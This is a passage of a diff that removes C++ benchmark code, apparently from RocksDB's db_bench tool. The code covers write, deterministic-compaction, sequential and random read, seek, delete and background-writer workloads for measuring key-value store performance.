-    int64_t ops_per_stage = max_ops;
-    if (FLAGS_num_column_families > 1 && FLAGS_num_hot_column_families > 0) {
-      ops_per_stage = (max_ops - 1) / (FLAGS_num_column_families /
-                                       FLAGS_num_hot_column_families) +
-                      1;
-    }
-
-    Duration duration(test_duration, max_ops, ops_per_stage);
-    for (size_t i = 0; i < num_key_gens; i++) {
-      key_gens[i].reset(new KeyGenerator(&(thread->rand), write_mode, num_,
-                                         ops_per_stage));
-    }
-
-    if (num_ != FLAGS_num) {
-      char msg[100];
-      snprintf(msg, sizeof(msg), "(%" PRIu64 " ops)", num_);
-      thread->stats.AddMessage(msg);
-    }
-
-    RandomGenerator gen;
-    WriteBatch batch;
-    Status s;
-    int64_t bytes = 0;
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    std::unique_ptr<const char[]> begin_key_guard;
-    Slice begin_key = AllocateKey(&begin_key_guard);
-    std::unique_ptr<const char[]> end_key_guard;
-    Slice end_key = AllocateKey(&end_key_guard);
-    std::vector<std::unique_ptr<const char[]>> expanded_key_guards;
-    std::vector<Slice> expanded_keys;
-    if (FLAGS_expand_range_tombstones) {
-      expanded_key_guards.resize(range_tombstone_width_);
-      for (auto& expanded_key_guard : expanded_key_guards) {
-        expanded_keys.emplace_back(AllocateKey(&expanded_key_guard));
-      }
-    }
-
-    int64_t stage = 0;
-    int64_t num_written = 0;
-    while (!duration.Done(entries_per_batch_)) {
-      if (duration.GetStage() != stage) {
-        stage = duration.GetStage();
-        if (db_.db != nullptr) {
-          db_.CreateNewCf(open_options_, stage);
-        } else {
-          for (auto& db : multi_dbs_) {
-            db.CreateNewCf(open_options_, stage);
-          }
-        }
-      }
-
-      size_t id = thread->rand.Next() % num_key_gens;
-      DBWithColumnFamilies* db_with_cfh = SelectDBWithCfh(id);
-      batch.Clear();
-
-      if (thread->shared->write_rate_limiter.get() != nullptr) {
-        thread->shared->write_rate_limiter->Request(
-            entries_per_batch_ * (value_size_ + key_size_), Env::IO_HIGH,
-            nullptr /* stats */, RateLimiter::OpType::kWrite);
-        // Set time at which last op finished to Now() to hide latency and
-        // sleep from rate limiter. Also, do the check once per batch, not
-        // once per write.
-        thread->stats.ResetLastOpTime();
-      }
-
-      for (int64_t j = 0; j < entries_per_batch_; j++) {
-        int64_t rand_num = key_gens[id]->Next();
-        GenerateKeyFromInt(rand_num, FLAGS_num, &key);
-        if (use_blob_db_) {
-#ifndef ROCKSDB_LITE
-          Slice val = gen.Generate(value_size_);
-          int ttl = rand() % 86400;
-          blob_db::BlobDB* blobdb =
-              static_cast<blob_db::BlobDB*>(db_with_cfh->db);
-          s = blobdb->PutWithTTL(write_options_, key, val, ttl);
-#endif  //  ROCKSDB_LITE
-        } else if (FLAGS_num_column_families <= 1) {
-          batch.Put(key, gen.Generate(value_size_));
-        } else {
-          // We use same rand_num as seed for key and column family so that we
-          // can deterministically find the cfh corresponding to a particular
-          // key while reading the key.
-          batch.Put(db_with_cfh->GetCfh(rand_num), key,
-                    gen.Generate(value_size_));
-        }
-        bytes += value_size_ + key_size_;
-        ++num_written;
-        if (writes_per_range_tombstone_ > 0 &&
-            num_written / writes_per_range_tombstone_ <=
-                max_num_range_tombstones_ &&
-            num_written % writes_per_range_tombstone_ == 0) {
-          int64_t begin_num = key_gens[id]->Next();
-          if (FLAGS_expand_range_tombstones) {
-            for (int64_t offset = 0; offset < range_tombstone_width_;
-                 ++offset) {
-              GenerateKeyFromInt(begin_num + offset, FLAGS_num,
-                                 &expanded_keys[offset]);
-              if (use_blob_db_) {
-#ifndef ROCKSDB_LITE
-                s = db_with_cfh->db->Delete(write_options_,
-                                            expanded_keys[offset]);
-#endif  //  ROCKSDB_LITE
-              } else if (FLAGS_num_column_families <= 1) {
-                batch.Delete(expanded_keys[offset]);
-              } else {
-                batch.Delete(db_with_cfh->GetCfh(rand_num),
-                             expanded_keys[offset]);
-              }
-            }
-          } else {
-            GenerateKeyFromInt(begin_num, FLAGS_num, &begin_key);
-            GenerateKeyFromInt(begin_num + range_tombstone_width_, FLAGS_num,
-                               &end_key);
-            if (use_blob_db_) {
-#ifndef ROCKSDB_LITE
-              s = db_with_cfh->db->DeleteRange(
-                  write_options_, db_with_cfh->db->DefaultColumnFamily(),
-                  begin_key, end_key);
-#endif  //  ROCKSDB_LITE
-            } else if (FLAGS_num_column_families <= 1) {
-              batch.DeleteRange(begin_key, end_key);
-            } else {
-              batch.DeleteRange(db_with_cfh->GetCfh(rand_num), begin_key,
-                                end_key);
-            }
-          }
-        }
-      }
-      if (!use_blob_db_) {
-#ifndef ROCKSDB_LITE
-        s = db_with_cfh->db->Write(write_options_, &batch);
-#endif  //  ROCKSDB_LITE
-      }
-      thread->stats.FinishedOps(db_with_cfh, db_with_cfh->db,
-                                entries_per_batch_, kWrite);
-      if (!s.ok()) {
-        fprintf(stderr, "put error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-    }
-    thread->stats.AddBytes(bytes);
-  }
-
-  Status DoDeterministicCompact(ThreadState* thread,
-                                CompactionStyle compaction_style,
-                                WriteMode write_mode) {
-#ifndef ROCKSDB_LITE
-    ColumnFamilyMetaData meta;
-    std::vector<DB*> db_list;
-    if (db_.db != nullptr) {
-      db_list.push_back(db_.db);
-    } else {
-      for (auto& db : multi_dbs_) {
-        db_list.push_back(db.db);
-      }
-    }
-    std::vector<Options> options_list;
-    for (auto db : db_list) {
-      options_list.push_back(db->GetOptions());
-      if (compaction_style != kCompactionStyleFIFO) {
-        db->SetOptions({{"disable_auto_compactions", "1"},
-                        {"level0_slowdown_writes_trigger", "400000000"},
-                        {"level0_stop_writes_trigger", "400000000"}});
-      } else {
-        db->SetOptions({{"disable_auto_compactions", "1"}});
-      }
-    }
-
-    assert(!db_list.empty());
-    auto num_db = db_list.size();
-    size_t num_levels = static_cast<size_t>(open_options_.num_levels);
-    size_t output_level = open_options_.num_levels - 1;
-    std::vector<std::vector<std::vector<SstFileMetaData>>> sorted_runs(num_db);
-    std::vector<size_t> num_files_at_level0(num_db, 0);
-    if (compaction_style == kCompactionStyleLevel) {
-      if (num_levels == 0) {
-        return Status::InvalidArgument("num_levels should be larger than 1");
-      }
-      bool should_stop = false;
-      while (!should_stop) {
-        if (sorted_runs[0].empty()) {
-          DoWrite(thread, write_mode);
-        } else {
-          DoWrite(thread, UNIQUE_RANDOM);
-        }
-        for (size_t i = 0; i < num_db; i++) {
-          auto db = db_list[i];
-          db->Flush(FlushOptions());
-          db->GetColumnFamilyMetaData(&meta);
-          if (num_files_at_level0[i] == meta.levels[0].files.size() ||
-              writes_ == 0) {
-            should_stop = true;
-            continue;
-          }
-          sorted_runs[i].emplace_back(
-              meta.levels[0].files.begin(),
-              meta.levels[0].files.end() - num_files_at_level0[i]);
-          num_files_at_level0[i] = meta.levels[0].files.size();
-          if (sorted_runs[i].back().size() == 1) {
-            should_stop = true;
-            continue;
-          }
-          if (sorted_runs[i].size() == output_level) {
-            auto& L1 = sorted_runs[i].back();
-            L1.erase(L1.begin(), L1.begin() + L1.size() / 3);
-            should_stop = true;
-            continue;
-          }
-        }
-        writes_ /= static_cast<int64_t>(open_options_.max_bytes_for_level_multiplier);
-      }
-      for (size_t i = 0; i < num_db; i++) {
-        if (sorted_runs[i].size() < num_levels - 1) {
-          fprintf(stderr, "n is too small to fill %" ROCKSDB_PRIszt " levels\n", num_levels);
-          exit(1);
-        }
-      }
-      for (size_t i = 0; i < num_db; i++) {
-        auto db = db_list[i];
-        auto compactionOptions = CompactionOptions();
-        auto options = db->GetOptions();
-        MutableCFOptions mutable_cf_options(options);
-        for (size_t j = 0; j < sorted_runs[i].size(); j++) {
-          compactionOptions.output_file_size_limit =
-              mutable_cf_options.MaxFileSizeForLevel(
-                  static_cast<int>(output_level));
-          std::cout << sorted_runs[i][j].size() << std::endl;
-          db->CompactFiles(compactionOptions, {sorted_runs[i][j].back().name,
-                                               sorted_runs[i][j].front().name},
-                           static_cast<int>(output_level - j) /*level*/);
-        }
-      }
-    } else if (compaction_style == kCompactionStyleUniversal) {
-      auto ratio = open_options_.compaction_options_universal.size_ratio;
-      bool should_stop = false;
-      while (!should_stop) {
-        if (sorted_runs[0].empty()) {
-          DoWrite(thread, write_mode);
-        } else {
-          DoWrite(thread, UNIQUE_RANDOM);
-        }
-        for (size_t i = 0; i < num_db; i++) {
-          auto db = db_list[i];
-          db->Flush(FlushOptions());
-          db->GetColumnFamilyMetaData(&meta);
-          if (num_files_at_level0[i] == meta.levels[0].files.size() ||
-              writes_ == 0) {
-            should_stop = true;
-            continue;
-          }
-          sorted_runs[i].emplace_back(
-              meta.levels[0].files.begin(),
-              meta.levels[0].files.end() - num_files_at_level0[i]);
-          num_files_at_level0[i] = meta.levels[0].files.size();
-          if (sorted_runs[i].back().size() == 1) {
-            should_stop = true;
-            continue;
-          }
-          num_files_at_level0[i] = meta.levels[0].files.size();
-        }
-        writes_ =  static_cast<int64_t>(writes_* static_cast<double>(100) / (ratio + 200));
-      }
-      for (size_t i = 0; i < num_db; i++) {
-        if (sorted_runs[i].size() < num_levels) {
-          fprintf(stderr, "n is too small to fill %" ROCKSDB_PRIszt  " levels\n", num_levels);
-          exit(1);
-        }
-      }
-      for (size_t i = 0; i < num_db; i++) {
-        auto db = db_list[i];
-        auto compactionOptions = CompactionOptions();
-        auto options = db->GetOptions();
-        MutableCFOptions mutable_cf_options(options);
-        for (size_t j = 0; j < sorted_runs[i].size(); j++) {
-          compactionOptions.output_file_size_limit =
-              mutable_cf_options.MaxFileSizeForLevel(
-                  static_cast<int>(output_level));
-          db->CompactFiles(
-              compactionOptions,
-              {sorted_runs[i][j].back().name, sorted_runs[i][j].front().name},
-              (output_level > j ? static_cast<int>(output_level - j)
-                                : 0) /*level*/);
-        }
-      }
-    } else if (compaction_style == kCompactionStyleFIFO) {
-      if (num_levels != 1) {
-        return Status::InvalidArgument(
-          "num_levels should be 1 for FIFO compaction");
-      }
-      if (FLAGS_num_multi_db != 0) {
-        return Status::InvalidArgument("Doesn't support multiDB");
-      }
-      auto db = db_list[0];
-      std::vector<std::string> file_names;
-      while (true) {
-        if (sorted_runs[0].empty()) {
-          DoWrite(thread, write_mode);
-        } else {
-          DoWrite(thread, UNIQUE_RANDOM);
-        }
-        db->Flush(FlushOptions());
-        db->GetColumnFamilyMetaData(&meta);
-        auto total_size = meta.levels[0].size;
-        if (total_size >=
-          db->GetOptions().compaction_options_fifo.max_table_files_size) {
-          for (auto file_meta : meta.levels[0].files) {
-            file_names.emplace_back(file_meta.name);
-          }
-          break;
-        }
-      }
-      // TODO(shuzhang1989): Investigate why CompactFiles not working
-      // auto compactionOptions = CompactionOptions();
-      // db->CompactFiles(compactionOptions, file_names, 0);
-      auto compactionOptions = CompactRangeOptions();
-      db->CompactRange(compactionOptions, nullptr, nullptr);
-    } else {
-      fprintf(stdout,
-              "%-12s : skipped (-compaction_stype=kCompactionStyleNone)\n",
-              "filldeterministic");
-      return Status::InvalidArgument("None compaction is not supported");
-    }
-
-// Verify seqno and key range
-// Note: the seqno get changed at the max level by implementation
-// optimization, so skip the check of the max level.
-#ifndef NDEBUG
-    for (size_t k = 0; k < num_db; k++) {
-      auto db = db_list[k];
-      db->GetColumnFamilyMetaData(&meta);
-      // verify the number of sorted runs
-      if (compaction_style == kCompactionStyleLevel) {
-        assert(num_levels - 1 == sorted_runs[k].size());
-      } else if (compaction_style == kCompactionStyleUniversal) {
-        assert(meta.levels[0].files.size() + num_levels - 1 ==
-               sorted_runs[k].size());
-      } else if (compaction_style == kCompactionStyleFIFO) {
-        // TODO(gzh): FIFO compaction
-        db->GetColumnFamilyMetaData(&meta);
-        auto total_size = meta.levels[0].size;
-        assert(total_size <=
-          db->GetOptions().compaction_options_fifo.max_table_files_size);
-          break;
-      }
-
-      // verify smallest/largest seqno and key range of each sorted run
-      auto max_level = num_levels - 1;
-      int level;
-      for (size_t i = 0; i < sorted_runs[k].size(); i++) {
-        level = static_cast<int>(max_level - i);
-        SequenceNumber sorted_run_smallest_seqno = kMaxSequenceNumber;
-        SequenceNumber sorted_run_largest_seqno = 0;
-        std::string sorted_run_smallest_key, sorted_run_largest_key;
-        bool first_key = true;
-        for (auto fileMeta : sorted_runs[k][i]) {
-          sorted_run_smallest_seqno =
-              std::min(sorted_run_smallest_seqno, fileMeta.smallest_seqno);
-          sorted_run_largest_seqno =
-              std::max(sorted_run_largest_seqno, fileMeta.largest_seqno);
-          if (first_key ||
-              db->DefaultColumnFamily()->GetComparator()->Compare(
-                  fileMeta.smallestkey, sorted_run_smallest_key) < 0) {
-            sorted_run_smallest_key = fileMeta.smallestkey;
-          }
-          if (first_key ||
-              db->DefaultColumnFamily()->GetComparator()->Compare(
-                  fileMeta.largestkey, sorted_run_largest_key) > 0) {
-            sorted_run_largest_key = fileMeta.largestkey;
-          }
-          first_key = false;
-        }
-        if (compaction_style == kCompactionStyleLevel ||
-            (compaction_style == kCompactionStyleUniversal && level > 0)) {
-          SequenceNumber level_smallest_seqno = kMaxSequenceNumber;
-          SequenceNumber level_largest_seqno = 0;
-          for (auto fileMeta : meta.levels[level].files) {
-            level_smallest_seqno =
-                std::min(level_smallest_seqno, fileMeta.smallest_seqno);
-            level_largest_seqno =
-                std::max(level_largest_seqno, fileMeta.largest_seqno);
-          }
-          assert(sorted_run_smallest_key ==
-                 meta.levels[level].files.front().smallestkey);
-          assert(sorted_run_largest_key ==
-                 meta.levels[level].files.back().largestkey);
-          if (level != static_cast<int>(max_level)) {
-            // compaction at max_level would change sequence number
-            assert(sorted_run_smallest_seqno == level_smallest_seqno);
-            assert(sorted_run_largest_seqno == level_largest_seqno);
-          }
-        } else if (compaction_style == kCompactionStyleUniversal) {
-          // level <= 0 means sorted runs on level 0
-          auto level0_file =
-              meta.levels[0].files[sorted_runs[k].size() - 1 - i];
-          assert(sorted_run_smallest_key == level0_file.smallestkey);
-          assert(sorted_run_largest_key == level0_file.largestkey);
-          if (level != static_cast<int>(max_level)) {
-            assert(sorted_run_smallest_seqno == level0_file.smallest_seqno);
-            assert(sorted_run_largest_seqno == level0_file.largest_seqno);
-          }
-        }
-      }
-    }
-#endif
-    // print the size of each sorted_run
-    for (size_t k = 0; k < num_db; k++) {
-      auto db = db_list[k];
-      fprintf(stdout,
-              "---------------------- DB %" ROCKSDB_PRIszt " LSM ---------------------\n", k);
-      db->GetColumnFamilyMetaData(&meta);
-      for (auto& levelMeta : meta.levels) {
-        if (levelMeta.files.empty()) {
-          continue;
-        }
-        if (levelMeta.level == 0) {
-          for (auto& fileMeta : levelMeta.files) {
-            fprintf(stdout, "Level[%d]: %s(size: %" PRIu64 " bytes)\n",
-                    levelMeta.level, fileMeta.name.c_str(), fileMeta.size);
-          }
-        } else {
-          fprintf(stdout, "Level[%d]: %s - %s(total size: %" PRIi64 " bytes)\n",
-                  levelMeta.level, levelMeta.files.front().name.c_str(),
-                  levelMeta.files.back().name.c_str(), levelMeta.size);
-        }
-      }
-    }
-    for (size_t i = 0; i < num_db; i++) {
-      db_list[i]->SetOptions(
-          {{"disable_auto_compactions",
-            std::to_string(options_list[i].disable_auto_compactions)},
-           {"level0_slowdown_writes_trigger",
-            std::to_string(options_list[i].level0_slowdown_writes_trigger)},
-           {"level0_stop_writes_trigger",
-            std::to_string(options_list[i].level0_stop_writes_trigger)}});
-    }
-    return Status::OK();
-#else
-    fprintf(stderr, "Rocksdb Lite doesn't support filldeterministic\n");
-    return Status::NotSupported(
-        "Rocksdb Lite doesn't support filldeterministic");
-#endif  // ROCKSDB_LITE
-  }
-
-  void ReadSequential(ThreadState* thread) {
-    if (db_.db != nullptr) {
-      ReadSequential(thread, db_.db);
-    } else {
-      for (const auto& db_with_cfh : multi_dbs_) {
-        ReadSequential(thread, db_with_cfh.db);
-      }
-    }
-  }
-
-  void ReadSequential(ThreadState* thread, DB* db) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    options.tailing = FLAGS_use_tailing_iterator;
-
-    Iterator* iter = db->NewIterator(options);
-    int64_t i = 0;
-    int64_t bytes = 0;
-    for (iter->SeekToFirst(); i < reads_ && iter->Valid(); iter->Next()) {
-      bytes += iter->key().size() + iter->value().size();
-      thread->stats.FinishedOps(nullptr, db, 1, kRead);
-      ++i;
-
-      if (thread->shared->read_rate_limiter.get() != nullptr &&
-          i % 1024 == 1023) {
-        thread->shared->read_rate_limiter->Request(1024, Env::IO_HIGH,
-                                                   nullptr /* stats */,
-                                                   RateLimiter::OpType::kRead);
-      }
-    }
-
-    delete iter;
-    thread->stats.AddBytes(bytes);
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  void ReadReverse(ThreadState* thread) {
-    if (db_.db != nullptr) {
-      ReadReverse(thread, db_.db);
-    } else {
-      for (const auto& db_with_cfh : multi_dbs_) {
-        ReadReverse(thread, db_with_cfh.db);
-      }
-    }
-  }
-
-  void ReadReverse(ThreadState* thread, DB* db) {
-    Iterator* iter = db->NewIterator(ReadOptions(FLAGS_verify_checksum, true));
-    int64_t i = 0;
-    int64_t bytes = 0;
-    for (iter->SeekToLast(); i < reads_ && iter->Valid(); iter->Prev()) {
-      bytes += iter->key().size() + iter->value().size();
-      thread->stats.FinishedOps(nullptr, db, 1, kRead);
-      ++i;
-      if (thread->shared->read_rate_limiter.get() != nullptr &&
-          i % 1024 == 1023) {
-        thread->shared->read_rate_limiter->Request(1024, Env::IO_HIGH,
-                                                   nullptr /* stats */,
-                                                   RateLimiter::OpType::kRead);
-      }
-    }
-    delete iter;
-    thread->stats.AddBytes(bytes);
-  }
-
-  void ReadRandomFast(ThreadState* thread) {
-    int64_t read = 0;
-    int64_t found = 0;
-    int64_t nonexist = 0;
-    ReadOptions options(FLAGS_verify_checksum, true);
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    std::string value;
-    DB* db = SelectDBWithCfh(thread)->db;
-
-    int64_t pot = 1;
-    while (pot < FLAGS_num) {
-      pot <<= 1;
-    }
-
-    Duration duration(FLAGS_duration, reads_);
-    do {
-      for (int i = 0; i < 100; ++i) {
-        int64_t key_rand = thread->rand.Next() & (pot - 1);
-        GenerateKeyFromInt(key_rand, FLAGS_num, &key);
-        ++read;
-        auto status = db->Get(options, key, &value);
-        if (status.ok()) {
-          ++found;
-        } else if (!status.IsNotFound()) {
-          fprintf(stderr, "Get returned an error: %s\n",
-                  status.ToString().c_str());
-          abort();
-        }
-        if (key_rand >= FLAGS_num) {
-          ++nonexist;
-        }
-      }
-      if (thread->shared->read_rate_limiter.get() != nullptr) {
-        thread->shared->read_rate_limiter->Request(
-            100, Env::IO_HIGH, nullptr /* stats */, RateLimiter::OpType::kRead);
-      }
-
-      thread->stats.FinishedOps(nullptr, db, 100, kRead);
-    } while (!duration.Done(100));
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "(%" PRIu64 " of %" PRIu64 " found, "
-             "issued %" PRIu64 " non-exist keys)\n",
-             found, read, nonexist);
-
-    thread->stats.AddMessage(msg);
-
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  int64_t GetRandomKey(Random64* rand) {
-    uint64_t rand_int = rand->Next();
-    int64_t key_rand;
-    if (read_random_exp_range_ == 0) {
-      key_rand = rand_int % FLAGS_num;
-    } else {
-      const uint64_t kBigInt = static_cast<uint64_t>(1U) << 62;
-      long double order = -static_cast<long double>(rand_int % kBigInt) /
-                          static_cast<long double>(kBigInt) *
-                          read_random_exp_range_;
-      long double exp_ran = std::exp(order);
-      uint64_t rand_num =
-          static_cast<int64_t>(exp_ran * static_cast<long double>(FLAGS_num));
-      // Map to a different number to avoid locality.
-      const uint64_t kBigPrime = 0x5bd1e995;
-      // Overflow is like %(2^64). Will have little impact of results.
-      key_rand = static_cast<int64_t>((rand_num * kBigPrime) % FLAGS_num);
-    }
-    return key_rand;
-  }
-
-  void ReadRandom(ThreadState* thread) {
-    int64_t read = 0;
-    int64_t found = 0;
-    int64_t bytes = 0;
-    ReadOptions options(FLAGS_verify_checksum, true);
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    PinnableSlice pinnable_val;
-
-    Duration duration(FLAGS_duration, reads_);
-    while (!duration.Done(1)) {
-      DBWithColumnFamilies* db_with_cfh = SelectDBWithCfh(thread);
-      // We use same key_rand as seed for key and column family so that we can
-      // deterministically find the cfh corresponding to a particular key, as it
-      // is done in DoWrite method.
-      int64_t key_rand = GetRandomKey(&thread->rand);
-      GenerateKeyFromInt(key_rand, FLAGS_num, &key);
-      read++;
-      Status s;
-      if (FLAGS_num_column_families > 1) {
-        s = db_with_cfh->db->Get(options, db_with_cfh->GetCfh(key_rand), key,
-                                 &pinnable_val);
-      } else {
-        pinnable_val.Reset();
-        s = db_with_cfh->db->Get(options,
-                                 db_with_cfh->db->DefaultColumnFamily(), key,
-                                 &pinnable_val);
-      }
-      if (s.ok()) {
-        found++;
-        bytes += key.size() + pinnable_val.size();
-      } else if (!s.IsNotFound()) {
-        fprintf(stderr, "Get returned an error: %s\n", s.ToString().c_str());
-        abort();
-      }
-
-      if (thread->shared->read_rate_limiter.get() != nullptr &&
-          read % 256 == 255) {
-        thread->shared->read_rate_limiter->Request(
-            256, Env::IO_HIGH, nullptr /* stats */, RateLimiter::OpType::kRead);
-      }
-
-      thread->stats.FinishedOps(db_with_cfh, db_with_cfh->db, 1, kRead);
-    }
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "(%" PRIu64 " of %" PRIu64 " found)\n",
-             found, read);
-
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  // Calls MultiGet over a list of keys from a random distribution.
-  // Returns the total number of keys found.
-  void MultiReadRandom(ThreadState* thread) {
-    int64_t read = 0;
-    int64_t num_multireads = 0;
-    int64_t found = 0;
-    ReadOptions options(FLAGS_verify_checksum, true);
-    std::vector<Slice> keys;
-    std::vector<std::unique_ptr<const char[]> > key_guards;
-    std::vector<std::string> values(entries_per_batch_);
-    while (static_cast<int64_t>(keys.size()) < entries_per_batch_) {
-      key_guards.push_back(std::unique_ptr<const char[]>());
-      keys.push_back(AllocateKey(&key_guards.back()));
-    }
-
-    Duration duration(FLAGS_duration, reads_);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      for (int64_t i = 0; i < entries_per_batch_; ++i) {
-        GenerateKeyFromInt(GetRandomKey(&thread->rand), FLAGS_num, &keys[i]);
-      }
-      std::vector<Status> statuses = db->MultiGet(options, keys, &values);
-      assert(static_cast<int64_t>(statuses.size()) == entries_per_batch_);
-
-      read += entries_per_batch_;
-      num_multireads++;
-      for (int64_t i = 0; i < entries_per_batch_; ++i) {
-        if (statuses[i].ok()) {
-          ++found;
-        } else if (!statuses[i].IsNotFound()) {
-          fprintf(stderr, "MultiGet returned an error: %s\n",
-                  statuses[i].ToString().c_str());
-          abort();
-        }
-      }
-      if (thread->shared->read_rate_limiter.get() != nullptr &&
-          num_multireads % 256 == 255) {
-        thread->shared->read_rate_limiter->Request(
-            256 * entries_per_batch_, Env::IO_HIGH, nullptr /* stats */,
-            RateLimiter::OpType::kRead);
-      }
-      thread->stats.FinishedOps(nullptr, db, entries_per_batch_, kRead);
-    }
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "(%" PRIu64 " of %" PRIu64 " found)",
-             found, read);
-    thread->stats.AddMessage(msg);
-  }
-
-  void IteratorCreation(ThreadState* thread) {
-    Duration duration(FLAGS_duration, reads_);
-    ReadOptions options(FLAGS_verify_checksum, true);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      Iterator* iter = db->NewIterator(options);
-      delete iter;
-      thread->stats.FinishedOps(nullptr, db, 1, kOthers);
-    }
-  }
-
-  void IteratorCreationWhileWriting(ThreadState* thread) {
-    if (thread->tid > 0) {
-      IteratorCreation(thread);
-    } else {
-      BGWriter(thread, kWrite);
-    }
-  }
-
-  void SeekRandom(ThreadState* thread) {
-    int64_t read = 0;
-    int64_t found = 0;
-    int64_t bytes = 0;
-    ReadOptions options(FLAGS_verify_checksum, true);
-    options.tailing = FLAGS_use_tailing_iterator;
-
-    Iterator* single_iter = nullptr;
-    std::vector<Iterator*> multi_iters;
-    if (db_.db != nullptr) {
-      single_iter = db_.db->NewIterator(options);
-    } else {
-      for (const auto& db_with_cfh : multi_dbs_) {
-        multi_iters.push_back(db_with_cfh.db->NewIterator(options));
-      }
-    }
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    Duration duration(FLAGS_duration, reads_);
-    char value_buffer[256];
-    while (!duration.Done(1)) {
-      if (!FLAGS_use_tailing_iterator) {
-        if (db_.db != nullptr) {
-          delete single_iter;
-          single_iter = db_.db->NewIterator(options);
-        } else {
-          for (auto iter : multi_iters) {
-            delete iter;
-          }
-          multi_iters.clear();
-          for (const auto& db_with_cfh : multi_dbs_) {
-            multi_iters.push_back(db_with_cfh.db->NewIterator(options));
-          }
-        }
-      }
-      // Pick a Iterator to use
-      Iterator* iter_to_use = single_iter;
-      if (single_iter == nullptr) {
-        iter_to_use = multi_iters[thread->rand.Next() % multi_iters.size()];
-      }
-
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_num, FLAGS_num, &key);
-      iter_to_use->Seek(key);
-      read++;
-      if (iter_to_use->Valid() && iter_to_use->key().compare(key) == 0) {
-        found++;
-      }
-
-      for (int j = 0; j < FLAGS_seek_nexts && iter_to_use->Valid(); ++j) {
-        // Copy out iterator's value to make sure we read them.
-        Slice value = iter_to_use->value();
-        memcpy(value_buffer, value.data(),
-               std::min(value.size(), sizeof(value_buffer)));
-        bytes += iter_to_use->key().size() + iter_to_use->value().size();
-
-        if (!FLAGS_reverse_iterator) {
-          iter_to_use->Next();
-        } else {
-          iter_to_use->Prev();
-        }
-        assert(iter_to_use->status().ok());
-      }
-
-      if (thread->shared->read_rate_limiter.get() != nullptr &&
-          read % 256 == 255) {
-        thread->shared->read_rate_limiter->Request(
-            256, Env::IO_HIGH, nullptr /* stats */, RateLimiter::OpType::kRead);
-      }
-
-      thread->stats.FinishedOps(&db_, db_.db, 1, kSeek);
-    }
-    delete single_iter;
-    for (auto iter : multi_iters) {
-      delete iter;
-    }
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "(%" PRIu64 " of %" PRIu64 " found)\n",
-             found, read);
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  void SeekRandomWhileWriting(ThreadState* thread) {
-    if (thread->tid > 0) {
-      SeekRandom(thread);
-    } else {
-      BGWriter(thread, kWrite);
-    }
-  }
-
-  void SeekRandomWhileMerging(ThreadState* thread) {
-    if (thread->tid > 0) {
-      SeekRandom(thread);
-    } else {
-      BGWriter(thread, kMerge);
-    }
-  }
-
-  void DoDelete(ThreadState* thread, bool seq) {
-    WriteBatch batch;
-    Duration duration(seq ? 0 : FLAGS_duration, deletes_);
-    int64_t i = 0;
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    while (!duration.Done(entries_per_batch_)) {
-      DB* db = SelectDB(thread);
-      batch.Clear();
-      for (int64_t j = 0; j < entries_per_batch_; ++j) {
-        const int64_t k = seq ? i + j : (thread->rand.Next() % FLAGS_num);
-        GenerateKeyFromInt(k, FLAGS_num, &key);
-        batch.Delete(key);
-      }
-      auto s = db->Write(write_options_, &batch);
-      thread->stats.FinishedOps(nullptr, db, entries_per_batch_, kDelete);
-      if (!s.ok()) {
-        fprintf(stderr, "del error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      i += entries_per_batch_;
-    }
-  }
-
-  void DeleteSeq(ThreadState* thread) {
-    DoDelete(thread, true);
-  }
-
-  void DeleteRandom(ThreadState* thread) {
-    DoDelete(thread, false);
-  }
-
-  void ReadWhileWriting(ThreadState* thread) {
-    if (thread->tid > 0) {
-      ReadRandom(thread);
-    } else {
-      BGWriter(thread, kWrite);
-    }
-  }
-
-  void ReadWhileMerging(ThreadState* thread) {
-    if (thread->tid > 0) {
-      ReadRandom(thread);
-    } else {
-      BGWriter(thread, kMerge);
-    }
-  }
-
-  void BGWriter(ThreadState* thread, enum OperationType write_merge) {
-    // Special thread that keeps writing until other threads are done.
-    RandomGenerator gen;
-    int64_t bytes = 0;
-
-    std::unique_ptr<RateLimiter> write_rate_limiter;
-    if (FLAGS_benchmark_write_rate_limit > 0) {
-      write_rate_limiter.reset(
-          NewGenericRateLimiter(FLAGS_benchmark_write_rate_limit));
-    }
-
-    // Don't merge stats from this thread with the readers.
-    thread->stats.SetExcludeFromMerge();
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    uint32_t written = 0;
-    bool hint_printed = false;
-
-    while (true) {
-      DB* db = SelectDB(thread);
-      {
-        MutexLock l(&thread->shared->mu);
-        if (FLAGS_finish_after_writes && written == writes_) {
-          fprintf(stderr, "Exiting the writer after %u writes...\n", written);
-          break;
-        }
-        if (thread->shared->num_done + 1 >= thread->shared->num_initialized) {
-          // Other threads have finished
-          if (FLAGS_finish_after_writes) {
-            // Wait for the writes to be finished
-            if (!hint_printed) {
-              fprintf(stderr, "Reads are finished. Have %d more writes to do\n",
-                      (int)writes_ - written);
-              hint_printed = true;
-            }
-          } else {
-            // Finish the write immediately
